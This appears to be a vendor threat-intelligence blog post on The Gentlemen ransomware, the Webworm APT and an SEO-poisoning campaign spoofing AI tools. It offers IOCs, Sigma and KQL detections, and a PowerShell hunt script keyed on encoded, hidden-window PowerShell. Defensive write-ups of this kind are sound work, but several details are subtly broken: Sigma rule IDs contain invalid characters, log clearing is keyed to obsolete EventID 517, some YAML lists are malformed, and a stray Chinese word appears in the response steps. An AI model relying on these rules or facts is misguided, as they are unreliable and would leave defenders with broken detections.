Back to Intelligence

The Gentlemen RaaS, Webworm APT, and AI SEO Poisoning: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 22, 2026
5 min read

Threat Summary

Current OTX pulse data indicates a convergence of high-fidelity threats targeting distinct sectors with overlapping operational security themes. We observe active campaigns from The Gentlemen RaaS operation leveraging CVE-2024-55591 for initial access and sophisticated defense evasion (Event Log clearing) to deploy ransomware. Simultaneously, the China-aligned Webworm APT group has evolved its burrowing techniques, utilizing legitimate platforms like Discord and Microsoft Graph API for C2 communications to evade network detection in European governmental sectors. Finally, a financially motivated eCrime campaign is exploiting the hype around generative AI (Gemini, Claude) via SEO poisoning and typosquatting to deliver fileless infostealers to software developers in the US and UK.

Threat Actor / Malware Profile

The Gentlemen (RaaS)

  • Malware Families: The Gentlemen, Qilin, Trojan:Win32/MpTamperBulkExcl.H.
  • Distribution: Exploitation of CVE-2024-55591, followed by PowerShell execution.
  • Behavior: Aggressive defense evasion, including clearing Security, System, and Application Event Logs. Uses Scheduled Tasks for persistence.
  • C2: SOCKS proxy usage to tunnel traffic.
  • Target: Transportation and Construction industries.

Webworm (APT)

  • Malware Families: EchoCreep, GraphWorm, WormFrp, ChainWorm.
  • Distribution: GitHub staging and custom proxy tools.
  • Behavior: "Burrowing" techniques to maintain long-term access. Decrypted C2 traffic reveals extensive operational planning.
  • C2: Abuse of legitimate web services; EchoCreep uses Discord Webhooks, GraphWorm uses Microsoft Graph API.
  • Target: Government and Education sectors in Europe and Africa.

AI Impersonation Campaign (eCrime)

  • Technique: SEO poisoning and Typosquatting of AI developer tools (Gemini, Claude) and package managers (Chocolatey).
  • Behavior: Delivery of infostealers via fake installations; fileless PowerShell execution chains.
  • Target: Technology sector and software developers.

IOC Analysis

The provided IOCs span infrastructure, file artifacts, and vulnerabilities:

  • Network Infrastructure: IPv4s (e.g., 193.233.202.17) and typosquatted domains (e.g., gemini-setup.com, claude-setup.com). SOC teams should immediately block these at the firewall and proxy level. The use of Discord for C2 requires specific SSL inspection rules, as blocking the domain entirely may impact business operations.
  • File Artifacts: SHA256 and SHA1 hashes are provided for ransomware payloads and backdoors. EDR solutions should be configured to quarantine files matching these hashes immediately.
  • Vulnerabilities: CVE-2024-55591 is a critical vector for The Gentlemen. Vulnerability management teams must prioritize patching this specific CVE.
  • Operization: IOCs should be loaded into SIEM correlation engines. Notably, the domains chocolatey.net (likely malicious in this context given the spoofing nature) and events.msft23.com should be treated as malicious sinks.

Detection Engineering

YAML
---
title: Potential The Gentlemen Ransomware Activity - Event Log Clearing
id: 4c8f3d2a-1e9b-4a5f-9c2d-3e6f7a8b9c0d
description: Detects attempts to clear Security, System, or Application event logs, a TTP observed in The Gentlemen ransomware incidents.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f3a9f2b3f9c0d1e2a3b4c
tags:
    - attack.defense_evasion
    - attack.t1070.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 517
    condition: selection
falsepositives:
    - Legitimate administrative activity (rare)
level: high
---
title: Webworm APT - Suspicious Discord Process Connection
id: 5d9e4e3b-2f0a-5b6g-0d3e-4f7g8b9c0d1e
description: Detects processes establishing connections to Discord endpoints, indicative of EchoCreep C2 activity observed in Webworm campaigns.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f3d9f2b3f9c0d1e2a3b4d
tags:
    - attack.command_and_control
    - attack.t1102.002
logsource:
    category: network_connection
detection:
    selection:
        DestinationHostname|contains: '.discord.com'
    filter_main_browsers:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    condition: selection and not filter_main_browsers
falsepositives:
    - Legitimate Discord client usage (non-browser)
level: medium
---
title: AI Impersonation Infostealer - Suspicious PowerShell CLI
id: 6e0f5f4c-3g1b-6c7h-1e4f-5g8h9c0d1e2f
description: Detects PowerShell execution patterns often associated with fileless infostealers delivered via SEO poisoning campaigns targeting developers.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f4e9f2b3f9c0d1e2a3b4e
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    service: process_creation
detection:
    selection_hidden:
        CommandLine|contains: '-windowstyle hidden'
    selection_encoded:
        CommandLine|contains:
            'FromBase64String'
            'IEX'
    selection_obfu:
        CommandLine|contains:
            'Invoke-Expression'
    condition: all of selection_*
falsepositives:
    - System administration scripts
level: high


kql
// Hunt for The Gentlemen RaaS and Webworm Indicators
// Look for network connections to known malicious IPs and domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("193.233.202.17", "77.110.122.137") 
   or RemoteUrl has_any ("gemini-setup.com", "claude-setup.com", "chocolatey.net", "events.msft23.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteUrl, RemotePort

// Hunt for Event Log Clearing (The Gentlemen TTP)
SecurityEvent
| where Timestamp > ago(7d)
| where EventID == 517 // Event log cleared
| project Timestamp, Computer, Account, SubjectUserName

// Hunt for processes connecting to Discord (Webworm EchoCreep)
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl contains "discord"
| where InitiatingProcessFileName !in ("chrome.exe", "msedge.exe", "firefox.exe", "discord.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl


powershell
# IOC Hunt Script for The Gentlemen and SEO Poisoning Campaigns
# Checks for file presence of known malicious hashes and suspicious scheduled tasks.

$MaliciousHashes = @(
    "f918535f974591ef031bd0f30a8171e3da27a6754e6426a8ba095f83195661c8",
    "9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333",
    "89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d"
)

Write-Host "[+] Hunting for malicious file hashes..." -ForegroundColor Cyan

# Get files on C: drive (adjust scope as necessary)
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($MaliciousHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

Write-Host "[+] Checking for Suspicious Scheduled Tasks (The Gentlemen TTP)..." -ForegroundColor Cyan

# Look for tasks running PowerShell with encoded commands or hidden windows
Get-ScheduledTask | Where-Object {$_.Actions.Execute -like "*powershell*"} | ForEach-Object {
    $task = $_
    $task.Actions | ForEach-Object {
        if ($_.Arguments -match "windowstyle hidden" -or $_.Arguments -match "EncodedCommand") {
            Write-Host "[!] SUSPICIOUS TASK FOUND: $($task.TaskName)" -ForegroundColor Yellow
            Write-Host "    Action: $($_.Execute) $($_.Arguments)"
        }
    }
}

Write-Host "[+] Hunt complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all IOCs (IPs, Domains) at the perimeter. Initiate hunts for Event ID 517 (Log Clearing) across the enterprise. Quarantine endpoints matching the provided file hashes.
  • 24h: If developer workstations were targeted by the SEO poisoning campaign,强制 reset credentials for developer accounts (GitHub, Azure AD, etc.) due to potential infostealer compromise.
  • 1 week: Review web filtering policies to block categories related to SEO poisoning and typosquatting. Enforce application controls to prevent unauthorized usage of PowerShell and scheduled tasks by non-administrators. Patch CVE-2024-55591 immediately.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwarethe-gentlemenwebwormseo-poisoningransomwarediscord-c2

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action